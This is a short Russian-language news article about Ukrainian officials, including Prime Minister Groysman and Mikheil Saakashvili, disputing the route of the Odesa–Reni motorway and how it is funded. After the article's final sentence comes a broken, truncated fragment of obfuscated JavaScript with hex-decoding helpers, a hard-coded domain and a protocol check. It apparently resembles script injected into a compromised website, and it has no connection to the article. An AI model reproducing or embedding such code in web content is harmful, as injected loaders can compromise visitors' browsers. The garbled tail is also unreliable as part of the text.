Судьба трассы Одесса-Рени: чиновники спорят про маршрут автобана «фото»

Судьба трассы Одесса-Рени: чиновники спорят про маршрут автобана

 

13234971_1033652690015657_1071337625_o

фото: USIonline.com

Как сообщает корреспондент Украинской Службы Информацииоб этом стало известно в ходе визита премьер-министра Владимира Гройсмана.

Так, глава Одесского облсовета Анатолий Урбанский отмечает, что трасса не должна идти в обход Измаила, так как порт начал выходить на положительную динамику и достиг грузооборота 2008 года.

В то же время, этот маршрут является более длинным и предполагается, что трасса уйдет на Рени в районе села Кринички. Глава правительства поддержал предложение Михеила Саакашвили про то, что трасса не может идти через Измаил, но может с автобана на Измаил уходить отдельная ветка.

По словам Саакашвили, как только трассу Одесса-Рени отремонтируют, то появится потребность в автобане. На сегодняшний день почти все средства необходимые на трассу есть. Так, более 400 млн грн пойдет за счет перевыполнения плана таможней, более трехсот уже выделило правительство. Сейчас выполняются работы по текущему и среднекапитальному ремонту.

Также премьер заметил, что надо плотнее работать с таможней как ресурсом для выполнения дорожных работ.

Как сообщала USIonline.com, премьер-министр лично проверил работу весового комплекса на трассе «Одесса-Южный».

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e